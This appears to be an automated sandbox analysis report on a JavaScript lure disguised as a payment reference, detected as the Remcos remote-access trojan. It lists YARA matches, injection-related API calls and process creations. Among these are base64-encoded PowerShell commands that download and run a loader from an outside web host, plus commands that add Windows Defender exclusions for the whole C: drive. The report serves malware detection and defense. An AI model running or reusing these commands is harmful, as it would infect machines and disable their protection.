Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA== Jump to behavior
Yara detected Remcos RAT
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2203224741.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\mkwain\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041CF2D SystemParametersInfoW, 20_2_0041CF2D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8DD3E SystemParametersInfoW, 20_2_06C8DD3E

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.2202403194.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.2205275601.0000000006C70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: colorcpl.exe PID: 7724, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\loader.exe Jump to dropped file
Sample has a suspicious name (potential lure to open the executable)
Source: Payment reference no. - FT910298955674.js Static file information: Suspicious name
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA== Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA== Jump to behavior
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\colorcpl.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03003220 NtAllocateVirtualMemory, 14_2_03003220
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A1A8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 14_2_0300A1A8
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A03C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 14_2_0300A03C
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300A0C4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 14_2_0300A0C4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300356C NtWriteVirtualMemory, 14_2_0300356C
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03007F10 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, 14_2_03007F10
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300321E NtAllocateVirtualMemory, 14_2_0300321E
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300564A GetThreadContext,SetThreadContext,NtResumeThread, 14_2_0300564A
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300564C GetThreadContext,SetThreadContext,NtResumeThread, 14_2_0300564C
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03003B88 NtProtectVirtualMemory, 14_2_03003B88
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03009FE8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 14_2_03009FE8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8EAD9 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 20_2_06C8EAD9
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_0303A1A8 NtOpenFile,NtReadFile,NtClose, 21_2_0303A1A8
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_03037F10 NtOpenProcess, 21_2_03037F10
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_0303356C NtWriteVirtualMemory, 21_2_0303356C
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_03033607 NtWriteVirtualMemory, 21_2_03033607
Contains functionality to shutdown / reboot the system
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress, 20_2_00416861
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C87672 ExitWindowsEx,LoadLibraryA,GetProcAddress, 20_2_06C87672
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB9ABC39D1 11_2_00007FFB9ABC39D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB9ABC2E11 11_2_00007FFB9ABC2E11
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF20B4 14_2_02FF20B4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FFD04A 14_2_02FFD04A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0042809D 20_2_0042809D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0045412B 20_2_0045412B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004421C0 20_2_004421C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004281D7 20_2_004281D7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043E1E0 20_2_0043E1E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041E29B 20_2_0041E29B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004373DA 20_2_004373DA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00438380 20_2_00438380
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00453472 20_2_00453472
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0042747E 20_2_0042747E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043E43D 20_2_0043E43D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004325A1 20_2_004325A1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043774C 20_2_0043774C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041F809 20_2_0041F809
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004379F6 20_2_004379F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004279F5 20_2_004279F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0044DAD9 20_2_0044DAD9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00433C73 20_2_00433C73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00413CA0 20_2_00413CA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00437CBD 20_2_00437CBD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043DD82 20_2_0043DD82
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00435F52 20_2_00435F52
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00437F78 20_2_00437F78
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043DFB1 20_2_0043DFB1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C9061A 20_2_06C9061A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA855D 20_2_06CA855D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C9828F 20_2_06C9828F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CC4283 20_2_06CC4283
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA81EB 20_2_06CA81EB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C98EAE 20_2_06C98EAE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CB2FD1 20_2_06CB2FD1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C98FE8 20_2_06C98FE8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAEFF1 20_2_06CAEFF1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CC4F3C 20_2_06CC4F3C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAEDC2 20_2_06CAEDC2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA8D89 20_2_06CA8D89
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA6D63 20_2_06CA6D63
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA8ACE 20_2_06CA8ACE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA4A84 20_2_06CA4A84
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C84AB1 20_2_06C84AB1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAEB93 20_2_06CAEB93
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CBE8EA 20_2_06CBE8EA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA8807 20_2_06CA8807
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C98806 20_2_06C98806
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAF24E 20_2_06CAF24E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA33B2 20_2_06CA33B2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8F0AC 20_2_06C8F0AC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA9191 20_2_06CA9191
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: 21_2_030220B4 21_2_030220B4
Found potential string decryption / allocating functions
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: String function: 0302457C appears 574 times
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: String function: 03024414 appears 154 times
Source: C:\Users\user\Links\Xdnxwtne.PIF Code function: String function: 03033FB4 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 03003FB4 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 03004030 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 02FF4240 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 02FF4414 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 02FF421C appears 67 times
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: String function: 02FF457C appears 799 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 004351E0 appears 55 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 06CA58E0 appears 43 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00434ACF appears 43 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00401F96 appears 49 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 06CA5FF1 appears 55 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00401EBF appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 06C72F28 appears 39 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 00402117 appears 45 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Payment reference no. - FT910298955674.js Initial sample: Strings found which are bigger than 50
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Yara signature match
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.6c70000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.6c71a11.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.6c70000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.colorcpl.exe.6c71a11.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
